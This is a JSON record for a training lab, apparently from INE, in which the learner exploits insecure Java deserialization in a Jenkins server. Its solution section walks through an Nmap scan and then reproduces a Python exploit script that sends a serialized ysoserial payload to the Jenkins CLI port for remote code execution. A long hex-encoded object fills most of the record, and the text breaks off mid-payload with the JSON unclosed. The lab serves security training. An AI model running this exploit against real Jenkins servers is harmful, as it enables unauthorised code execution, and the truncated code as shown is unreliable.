{
    "id": "f3e25b41-10bd-4694-a0c7-10048b91f004",
    "name": "Java Insecure Deserialization - Scenario 2",
    "slug": "java-insecure-deserialization-scenario-2",
    "status": "published",
    "lab_type": "pta",
    "is_sample": false,
    "duration_in_seconds": 1800,
    "metadata": {
        "courses": [
            "e68327e2-fb00-46b3-bbe3-f85fcb779c1f",
            "630a470a-1ccf-44eb-8111-8947846b5d78"
        ],
        "pta_sdn": "202",
        "collections": [],
        "pta_namespace": "my.ine",
        "learning_paths": [],
        "has_published_parent": true
    },
    "session": null,
    "company": "a491bc32-c056-4946-9169-cc053387bada",
    "created": "2022-06-16T20:23:34.003950Z",
    "modified": "2024-12-31T15:48:59.278279Z",
    "is_beta": false,
    "lab_objectives": [],
    "main_learning_area": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
    "learning_areas": [
        {
            "id": "3e1aa06f-2e9f-4789-b50d-aa027ad8dcfa",
            "name": "Cyber Security",
            "slug": "cyber-security"
        }
    ],
    "categories": [],
    "tags": [],
    "difficulty": null,
    "is_web_access": false,
    "is_lab_experience": false,
    "is_featured": false,
    "cve": null,
    "severity": null,
    "year": null,
    "classification": null,
    "is_trackable": false,
    "cpe_credits": null,
    "is_skill_check": false,
    "external_url": "",
    "solution_video": null,
    "explanation_video": null,
    "description": "# Java Insecure Deserialization II\n\n# Scenario\n\nYour goal is to exploit a Jenkins application that is vulnerable to insecure deserialization. Before you start, you might want to read [this](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/) article, which includes details regarding the discovery of that vulnerability.\n\n**Target URL:**\n```\nhttp://demo.ine.local\n```\nThe Jenkins application is served at this URL on the target machine. Use this URL to find and exploit the vulnerability.",
    "description_html": "<h1>Java Insecure Deserialization II</h1>\n<h1>Scenario</h1>\n<p>Your goal is to exploit a Jenkins application that is vulnerable to insecure deserialization. Before you start, you might want to read <a href=\"https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\">this</a> article, which includes details regarding the discovery of that vulnerability.</p>\n<p><strong>Target URL:</strong>\n<pre class=\"codehilite\"><code>http://demo.ine.local</code></pre>\nThe Jenkins application is served at this URL on the target machine. Use this URL to find and exploit the vulnerability.</p>",
    "tasks": "# Goals\n\nPerform a deserialization attack on the Jenkins application to achieve remote code execution.\n\n\n# Recommended tools\n\n-   Ysoserial\n\n-   Python\n\n-   <https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py>\n\n-   Nmap",
    "tasks_html": "<h1>Goals</h1>\n<p>Perform a deserialization attack on the Jenkins application to achieve remote code execution.</p>\n<h1>Recommended tools</h1>\n<ul>\n<li>\n<p>Ysoserial</p>\n</li>\n<li>\n<p>Python</p>\n</li>\n<li>\n<p><a href=\"https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py\">https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py</a></p>\n</li>\n<li>\n<p>Nmap</p>\n</li>\n</ul>",
    "published_date": "2020-10-20T15:32:24Z",
    "solutions": "# Solution\n\n\n**Step 1:** Start the lab. Wait until the lab is ready. Once the lab is ready, the Kali Linux interface will be available in the browser.\n\n![0](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/0.png)\n\n\n**Step 2:** Scan the network with Nmap and gather information about the target machine.\n\nUse the following command to get information about the open ports and services on the network.\n\n**Command:**\n```\nnmap demo.ine.local\n```\n![1](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/1.png)\n\nThe scan output gives the IP address of the target machine and the ports that are open on it.\n\n**Step 3:** Inspect the Jenkins application by navigating to the IP address at port 8080 in the web browser.\n\n**Target URL:**\n```\nhttp://192.24.161.3:8080/\n```\n\n![2](https://assets.ine.com/content/ptp/java-insecure-deserialization-ii/2.png)\n\n**Step 4:** Copy and paste the Python exploit code and save it as exploit.py.\n\n**Source:** <https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py>\n\n**Code:**\n```py\n#!/usr/bin/python\n#usage: ./jenkins.py host port /path/to/payload\nimport socket\nimport sys\nimport requests\nimport base64\nhost = sys.argv[1]\nport = sys.argv[2]\n#Query Jenkins over HTTP to find what port the CLI listener is on\nr = requests.get('http://'+host+':'+port)\ncli_port = int(r.headers['X-Jenkins-CLI-Port'])\n#Open a socket to the CLI port\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_address = (host, cli_port)\nprint 'connecting to %s port %s' % server_address\nsock.connect(server_address)\n# Send headers\nheaders='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74'\nprint 'sending \"%s\"' % headers\nsock.send(headers)\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\npayloadObj = 
open(sys.argv[3],'rb').read()\npayload_b64 = base64.b64encode(payloadObj)\npayload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x4c\\x00\\x10\\x63\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x74\\x00\\x30\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x3b\\x5b\\x00\\x07\\x72\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x08\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\\x64\\x4c\\x00\\x08\\x72\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x74\\x00\\x1a\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x52\\x65\\x73\\x70\\x6f\\x6e\\x73\\x65\\x3b\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x09\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x41\\x74\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x1e\\x68\\x75\
\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x24\\x53\\x6f\\x75\\x72\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x4c\\x00\\x06\\x74\\x68\\x69\\x73\\x24\\x30\\x74\\x00\\x19\\x4c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2f\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2f\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x3b\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\xd0\\xfd\\x1f\\x3e\\x1a\\x3b\\x1c\\xc4\\x02\\x00\\x00\\x78\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\xd5\\xc6\\x35\\x27\\x39\\x77\\xb8\\xcb\\x03\\x00\\x04\\x4c\\x00\\x05\\x63\\x61\\x75\\x73\\x65\\x74\\x00\\x15\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x54\\x68\\x72\\x6f\\x77\\x61\\x62\\x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x03\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x0c\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\
\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x3c\\x74\\x00\\x1b\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x10\\x55\\x73\\x65\\x72\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x04\\x63\\x61\\x6c\\x6c\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\
\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\
\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x3c\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x70\\x73\\x7d\\x00\\x00\\x00\\x02\\x00\\x2e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x00\\x1c\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x49\\x52\\x65\\x61\\x64\\x52\\x65\\x73\\x6f\\x6c\\x76\\x65\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x03\\x00\\x05\\x5a\\x00\\x14\\x61\\x75\\x74\\x6f\\x55\\x6e\\x65\\x78\\x70\\x6f\\x72\\x74\\x42\\x79\\x43\\x61\\x6c\\x6c\\x65\\x72\\x5a\\x00\\x09\\x67\\x6f\\x69\\x6e\\x67\\x48\\x6f\\x6d\\x65\\x49\\x00\\x03\\x6f\\x69\\x64\\x5a\\x00\\x09\\x75\\x73\\x65\\x72\\x50\\x72\\x6f\\x78\\x79\\x4c\\x00\\x06\\x6f\\x72\\x69\\x67\\x69\\x6e\\x71\\x00\
\x7e\\x00\\x0d\\x78\\x70\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x73\\x71\\x00\\x7e\\x00\\x0b\\x71\\x00\\x7e\\x00\\x43\\x74\\x00\\x78\\x50\\x72\\x6f\\x78\\x79\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x40\\x32\\x20\\x77\\x61\\x73\\x20\\x63\\x72\\x65\\x61\\x74\\x65\\x64\\x20\\x66\\x6f\\x72\\x20\\x69\\x6e\\x74\\x65\\x72\\x66\\x61\\x63\\x65\\x20\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x24\\x49\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x75\\x71\\x00\\x7e\\x00\\x11\\x00\\x00\\x00\\x0d\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x7d\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x89\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x74\\x00\\x04\\x77\\x72\\x61\\x70\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x6a\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x74\\x00\\x06\\x65\\x78\\x70\\x6f\\x72\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\xa6\\x74\\x00\\x21\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x74\\x00\\x16\\x52\\x65\\x6d\\x6f\\x74\\x65\\x43\\x6c\\x61\\x73\\x73\\x4c\\x6f\\x61\\x64\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x4a\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x46\\x71\\x00\\x7e\\x00\\x1d\\x71\\x00\\x7e\\x00\\x1e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x03\\x08\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x22\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xfa\\x71\\x00\\x7e\\x00\\x24\\x71\\x00\\x7e\\x00\\x25\\x71\\x00\\x7e\\x00\\x26\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x71\\x00\
\x7e\\x00\\x28\\x70\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x71\\x00\\x7e\\x00\\x20\\x71\\x00\\x7e\\x00\\x21\\x71\\x00\\x7e\\x00\\x2b\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x71\\x00\\x7e\\x00\\x30\\x71\\x00\\x7e\\x00\\x31\\x71\\x00\\x7e\\x00\\x32\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x34\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2d\\x71\\x00\\x7e\\x00\\x2e\\x71\\x00\\x7e\\x00\\x36\\x71\\x00\\x7e\\x00\\x3a\\x78\\x78\\x75\\x72\\x00\\x02\\x5b\\x42\\xac\\xf3\\x17\\xf8\\x06\\x08\\x54\\xe0\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x07\\x46\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x04\\x49\\x00\\x03\\x6f\\x69\\x64\\x5b\\x00\\x09\\x61\\x72\\x67\\x75\\x6d\\x65\\x6e\\x74\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x05\\x74\\x79\\x70\\x65\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x77\\x08\\xff\\xff\\xff\\xfe\\x00\\x00\\x00\\x02\\x78\\x72\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x03\\x49\\x00\\x02\\x69\\x64\\x49\\x00\\x08\\x6c\\x61\\x73\\x74\\x49\\x6f\\x49\
